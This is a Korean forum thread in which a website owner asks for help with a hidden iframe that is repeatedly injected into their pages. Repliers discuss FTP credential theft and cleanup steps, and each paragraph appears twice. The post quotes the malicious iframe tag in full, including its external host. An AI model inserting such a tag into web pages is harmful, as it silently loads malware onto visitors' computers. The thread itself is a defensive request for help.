아이프레임 악성코드 삽입되는 문제 정보
아이프레임 악성코드 삽입되는 문제본문
iframe src="http://bigbestlite.cn:8080/index.php" width=186 height=165 style="visibility: hidden
다음과 같은 아이프레임이 소스내에 추가되는 현상이 생기고 있습니다. 하루에 두번정도씩 생겨나서 지우고 나면 다시 생기고 생기고 하네요
현재 SFTP 로만 접속중이며 관련 코드는 삭제하고 FTP비번도 바꿨습니다.
추가적으로 다른 조치를 취할게 있는지 좀 알려주세요 이놈땜에 매일매일 아주 고생이네요;;
관련 보안패치가 있다면 어떤건지도 좀 부탁드립니다.
다음과 같은 아이프레임이 소스내에 추가되는 현상이 생기고 있습니다. 하루에 두번정도씩 생겨나서 지우고 나면 다시 생기고 생기고 하네요
현재 SFTP 로만 접속중이며 관련 코드는 삭제하고 FTP비번도 바꿨습니다.
추가적으로 다른 조치를 취할게 있는지 좀 알려주세요 이놈땜에 매일매일 아주 고생이네요;;
관련 보안패치가 있다면 어떤건지도 좀 부탁드립니다.
댓글 전체
최근 몇개월 전부터 악성코드가 유행하고 있습니다.
최근 악성코드의 유형은 이렇습니다
감염된 홈페이지에 접속한 방문자의 컴에 파일이 다운로드 되어 특정 파일을 생성시킨다
감염된 컴퓨터로 인터넷 백신업체나 검색엔진 사이트를 방문하면 특정 사이트로 이동된다
감염되는 컴퓨터와 전염시키는 숙주컴이 따로 존재한다
악성코드가 삽입된 홈페이지의 코드를 제거하더라도 숙주컴에 해당하는 사람이 접속하면 재차 감염된다
해결법은 이렇습니다
관리자가 해당 홈페이지에 접속하는 모든 컴에서 바이러스 검사 후 제거한다
제거 후 즉시 해당 서버의 FTP 계정의 패스워드를 변경한다 (이러하지 않으면 주변에서 방문하는 분중 숙주 컴이 존재하면 재차 감염됩니다)
이상입니다~
잘 해결되시길
최근 악성코드의 유형은 이렇습니다
감염된 홈페이지에 접속한 방문자의 컴에 파일이 다운로드 되어 특정 파일을 생성시킨다
감염된 컴퓨터로 인터넷 백신업체나 검색엔진 사이트를 방문하면 특정 사이트로 이동된다
감염되는 컴퓨터와 전염시키는 숙주컴이 따로 존재한다
악성코드가 삽입된 홈페이지의 코드를 제거하더라도 숙주컴에 해당하는 사람이 접속하면 재차 감염된다
해결법은 이렇습니다
관리자가 해당 홈페이지에 접속하는 모든 컴에서 바이러스 검사 후 제거한다
제거 후 즉시 해당 서버의 FTP 계정의 패스워드를 변경한다 (이러하지 않으면 주변에서 방문하는 분중 숙주 컴이 존재하면 재차 감염됩니다)
이상입니다~
잘 해결되시길
/yume... 방문자가 서버컴을 어떻게 감염시켜요... 관리자가 클라컴의 바이러스 검사 어떻게 합니까
아이프레임은 소스상의 헛점을 노린게 많으나 위상황을 보니 기존소스상에 다른소스를 끼워 넣어서
파일변경시 원상태로 계속 복구시키는 것 같네요.
비번변경도 별의미 없을듯합니다. 소스를 숨겨놓은 상태 같아서
백업파일로 복구시키시던가 아니면 직접 의심되는 것은 찾아보셔야 하겠군요.
아이프레임은 소스상의 헛점을 노린게 많으나 위상황을 보니 기존소스상에 다른소스를 끼워 넣어서
파일변경시 원상태로 계속 복구시키는 것 같네요.
비번변경도 별의미 없을듯합니다. 소스를 숨겨놓은 상태 같아서
백업파일로 복구시키시던가 아니면 직접 의심되는 것은 찾아보셔야 하겠군요.
//TheK
기존의 경우와 달리 이번에 유행하고 있는 악성코드 삽입문제는
악성코드가 삽입된 홈페이지를 방문자 역시 감염되게 됩니다
방문과 동시에 파일이 다운로드 되고 시스템 폴더에 특정 파일의 압축이 풀리면서 일시적으로
컴퓨터가 버벅거리는 현상이 나타납니다
또한 이 감염자중 자신의 컴만 감염되는 사람과 새로운 숙주가 되는 사람으로 나누어지게 됩니다
따라서 방문했던 사람들 모두 바이러스 체크를 해야하며 이 중 누가 숙주인지는 알 수 없습니다
숙주 컴퓨터의 바이러스를 제거하지 않는한 지속적인 웹사이트 감염이 일어나게 됩니다.
자신의 컴 이외의 컴을 체크하는데 어려움이 있으므로 자신이 체크 가능한 컴을 모두 치료한 뒤
FTP 계정 패스워드를 변경하는 게 우선입니다
최근 카페24등 호스팅 사이트의 계정비밀번호 변경이 이와 같은 이유로 이루어지고 있습니다
기존의 경우와 달리 이번에 유행하고 있는 악성코드 삽입문제는
악성코드가 삽입된 홈페이지를 방문자 역시 감염되게 됩니다
방문과 동시에 파일이 다운로드 되고 시스템 폴더에 특정 파일의 압축이 풀리면서 일시적으로
컴퓨터가 버벅거리는 현상이 나타납니다
또한 이 감염자중 자신의 컴만 감염되는 사람과 새로운 숙주가 되는 사람으로 나누어지게 됩니다
따라서 방문했던 사람들 모두 바이러스 체크를 해야하며 이 중 누가 숙주인지는 알 수 없습니다
숙주 컴퓨터의 바이러스를 제거하지 않는한 지속적인 웹사이트 감염이 일어나게 됩니다.
자신의 컴 이외의 컴을 체크하는데 어려움이 있으므로 자신이 체크 가능한 컴을 모두 치료한 뒤
FTP 계정 패스워드를 변경하는 게 우선입니다
최근 카페24등 호스팅 사이트의 계정비밀번호 변경이 이와 같은 이유로 이루어지고 있습니다
저도 그거때문에 계속 고생했는데요, 결국 제 컴(로컬)이 문제였습니다.
백도어같은 프로그램이 컴퓨터에 깔려서
ftp 비밀번호를 다른곳으로 전송했다고 합니다. (깡패의24시의 답변 메일 중)
조치사항으로는 아이프레임이 들어가있는 페이지를 전부 찾아서 악성 코드를 지우시고,
ftp 접속 비밀번호를 교체하세요.
ftp 프로그램쓰실때 아이디 비밀번호 저장 해서 쓰지 마시고 접속시마다 타이핑해서 접속하세요.
그리고 로컬 컴퓨터를 바이러스 정밀검사나 가능하시면 포멧 한번 하시고,
현재 하고 계신것처럼 sftp 로 이용하시면 될거 같습니다.
도움이 되셨길 바랍니다 ^^
백도어같은 프로그램이 컴퓨터에 깔려서
ftp 비밀번호를 다른곳으로 전송했다고 합니다. (깡패의24시의 답변 메일 중)
조치사항으로는 아이프레임이 들어가있는 페이지를 전부 찾아서 악성 코드를 지우시고,
ftp 접속 비밀번호를 교체하세요.
ftp 프로그램쓰실때 아이디 비밀번호 저장 해서 쓰지 마시고 접속시마다 타이핑해서 접속하세요.
그리고 로컬 컴퓨터를 바이러스 정밀검사나 가능하시면 포멧 한번 하시고,
현재 하고 계신것처럼 sftp 로 이용하시면 될거 같습니다.
도움이 되셨길 바랍니다 ^^